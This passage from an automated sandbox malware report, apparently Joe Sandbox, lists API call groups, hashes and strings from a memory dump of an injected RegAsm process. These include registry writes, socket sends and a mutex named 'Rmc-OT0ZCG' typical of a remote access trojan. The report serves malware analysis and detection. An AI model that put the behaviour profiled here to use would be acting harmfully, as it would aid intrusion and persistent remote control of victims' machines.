                            • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                            • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                            • RegCloseKey.KERNEL32(?), ref: 004137EC
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: pth_unenc
                            • API String ID: 1818849710-4028850238
                            • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                            • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                            • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                            • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                            APIs
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                            • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                            • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Create$CloseEventHandleObjectSingleThreadWait
                            • String ID:
                            • API String ID: 3360349984-0
                            • Opcode ID: d789810c3dbbbf6e259483921c055d4dbd3c5e70ff459b446317af5ddb3a36c3
                            • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                            • Opcode Fuzzy Hash: d789810c3dbbbf6e259483921c055d4dbd3c5e70ff459b446317af5ddb3a36c3
                            • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                            APIs
                            • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                            • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                              • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                              • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: HandleModuleProtectVirtual
                            • String ID:
                            • API String ID: 2905821283-0
                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                            • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                            • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                            APIs
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                            • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: LibraryLoad$ErrorLast
                            • String ID:
                            • API String ID: 3177248105-0
                            • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                            • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                            • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                            • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                            APIs
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                            • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad$ErrorLast
                            • String ID:
                            • API String ID: 3177248105-0
                            • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                            • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                            • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                            • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                            • CloseHandle.KERNEL32(00000000), ref: 0041C576
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleReadSize
                            • String ID:
                            • API String ID: 3919263394-0
                            • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                            • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                            • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                            • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                            APIs
                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                            • GetLastError.KERNEL32 ref: 0040D0BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateErrorLastMutex
                            • String ID: Rmc-OT0ZCG
                            • API String ID: 1925916568-2453204340
                            • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                            • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                            • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                            • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                            APIs
                            • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                              • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                              • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                              • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: HandleModuleProtectVirtual
                            • String ID:
                            • API String ID: 2905821283-0
                            • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                            • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                            • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                            • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                            APIs
                            • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                            • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: EventObjectSingleWaitsend
                            • String ID:
                            • API String ID: 3963590051-0
                            • Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                            • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                            • Opcode Fuzzy Hash: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                            • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                            APIs
                            • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                            • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                            • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: ProtectVirtual$HandleModule
                            • String ID:
                            • API String ID: 3519776433-0
                            • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                            • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                            • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                            • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                            APIs
                            • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                            • RegQueryValueExA.KERNEL32 ref: 00413622
                            • RegCloseKey.KERNEL32(?), ref: 0041362D
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                            • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                            • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                            • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                            APIs
                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                            • RegQueryValueExA.KERNEL32 ref: 00413768
                            • RegCloseKey.KERNEL32(00000000), ref: 00413773
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                            • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                            • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                            • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                            APIs
                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                            • RegQueryValueExA.KERNEL32 ref: 004135C2
                            • RegCloseKey.KERNEL32(?), ref: 004135CD
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                            • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                            • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                            • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                            APIs
                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
                            • RegQueryValueExA.KERNEL32 ref: 00413565
                            • RegCloseKey.KERNEL32(?), ref: 00413570
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                            • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                            • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                            • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                            APIs
                            • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                            • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                            • RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID:
                            • API String ID: 1818849710-0
                            • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                            • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                            • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                            • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                            APIs
                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: Info
                            • String ID:
                            • API String ID: 1807457897-3916222277
                            • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                            • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                            • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                            • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                            APIs
                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Info
                            • String ID:
                            • API String ID: 1807457897-3916222277
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _wcslen
                            • String ID: ;S
                            • API String ID: 176396367-719420394
                            APIs
                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                             • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: String
                            • String ID: LCMapStringEx
                            • API String ID: 2568140703-3893581201
                            APIs
                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: String
                            • String ID: LCMapStringEx
                            • API String ID: 2568140703-3893581201
                            APIs
                            • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                            Strings
                            • InitializeCriticalSectionEx, xrefs: 00448B1F
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountCriticalInitializeSectionSpin
                            • String ID: InitializeCriticalSectionEx
                            • API String ID: 2593887523-3084827643
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                             • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: Alloc
                            • String ID: FlsAlloc
                            • API String ID: 2773662609-671089009
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Alloc
                            • String ID: FlsAlloc
                            • API String ID: 2773662609-671089009
                            APIs
                            • try_get_function.LIBVCRUNTIME ref: 10003B06
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                             • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: try_get_function
                            • String ID: FlsAlloc
                            • API String ID: 2742660187-671089009
                            APIs
                            • try_get_function.LIBVCRUNTIME ref: 00438E29
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: try_get_function
                            • String ID: FlsAlloc
                            • API String ID: 2742660187-671089009
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: GlobalMemoryStatus
                            • String ID: @
                            • API String ID: 1890195054-2766056989
                            APIs
                              • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                            • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                             • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: CodeInfoPageValid
                            • String ID:
                            • API String ID: 546120528-0
                            APIs
                              • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                            • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
